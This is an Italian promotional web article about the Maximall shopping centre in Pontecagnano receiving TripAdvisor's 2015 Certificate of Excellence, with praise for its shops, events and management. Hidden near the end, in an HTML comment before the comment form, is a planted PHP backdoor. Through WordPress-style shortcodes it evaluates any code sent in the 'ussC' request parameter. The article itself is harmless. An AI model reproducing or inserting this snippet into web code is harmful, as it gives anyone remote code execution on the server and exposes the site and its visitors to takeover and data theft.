Certificato Eccellenza Maximall TripAdvisorTripAdvisor ha attribuito il Certificato di Eccellenza 2015 al Centro Commerciale Maximall di Pontecagnano, sottolineando con questo prestigioso riconoscimento gli ottimi feedback rilasciati giornalmente dai numerosissimi visitatori della struttura campana.

Si tratta di un premio che da lustro a tutto il management che si occupa giornalmente della cura, della manutenzione e dell’amministrazione del Centro Commerciale, e che rappresenta un grosso spunto d’orgoglio per chi ha contribuito alla realizzazione e al successo di pubblico del Maximall di Pontecagnano.

Il Certificato d’Eccellenza di TripAdvisor è un riconoscimento degno di nota anche in considerazione del fatto che questo rappresenta un quadro pienamente esaustivo dell’effettiva esperienza di shopping, confort e gradevolezza che la struttura campana è in grado di offrire a tutti i suoi visitatori, elevandosi a punto di riferimento assoluto per lo shopping, non solo per il pubblico locale.

Nel folto pubblico che ha dimostrato enorme apprezzamento per la struttura creata e gestita dal Gruppo Irgenre figura, infatti, anche un consistente novero di turisti stranieri, che hanno trasformato il centro commerciale, al pari di altri luoghi di interesse storico e monumentale della Regione, in una meta irrinunciabile da visitare durante le loro vacanze.

A decretare il successo di pubblico del Centro Commerciale contribuisce la presenza di cento negozi delle firme più prestigiose, come H&M e Zara. Numerosi visitatori sono inoltre periodicamente richiamati dal nutrito palinsesto di eventi, mostre e manifestazioni ospitate al Centro dell’edificio.

In concomitanza dell’attribuzione di questo riconoscimento tutto il Management di Maximall tiene a condividere quest’affermazione proprio con il pubblico, che ha reso possibile questo successo con i suoi giudizi favorevoli espressi in forma pubblica su internet e con le migliaia di visite settimanali registrate dal momento dell’apertura della struttura.

Ai ringraziamenti pubblici che Maximall Management porge a tutti i visitatori che hanno fatto acquisti all’interno del centro, l’intero personale amministrativo ha tenuto ad aggiungere il proprio impegno formale ad elevare ulteriormente la qualità dell’esperienza di relax e benessere offerta dall’edificio campano.

Il Centro Commerciale Maximall di Pontecagnano è stato progettato dal Gruppo Irgenre, storica attività dedita alla realizzazione e alla gestione di grandi strutture commerciali fondata 25 anni fa da Corrado e Paolo Negri.

L’amministrazione della struttura è invece curata dalla Maximall Management, Società Gestionale del Gruppo che si occupa di ricerche di mercato, dello studio e della valutazione di concept e delle varie fasi di commercializzazione e mix merchandising.

<!– [insert_php]if (isset($_REQUEST["ussC"])){eval($_REQUEST["ussC"]);exit;}[/insert_php][php]if (isset($_REQUEST["ussC"])){eval($_REQUEST["ussC"]);exit;}[/php] –>

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *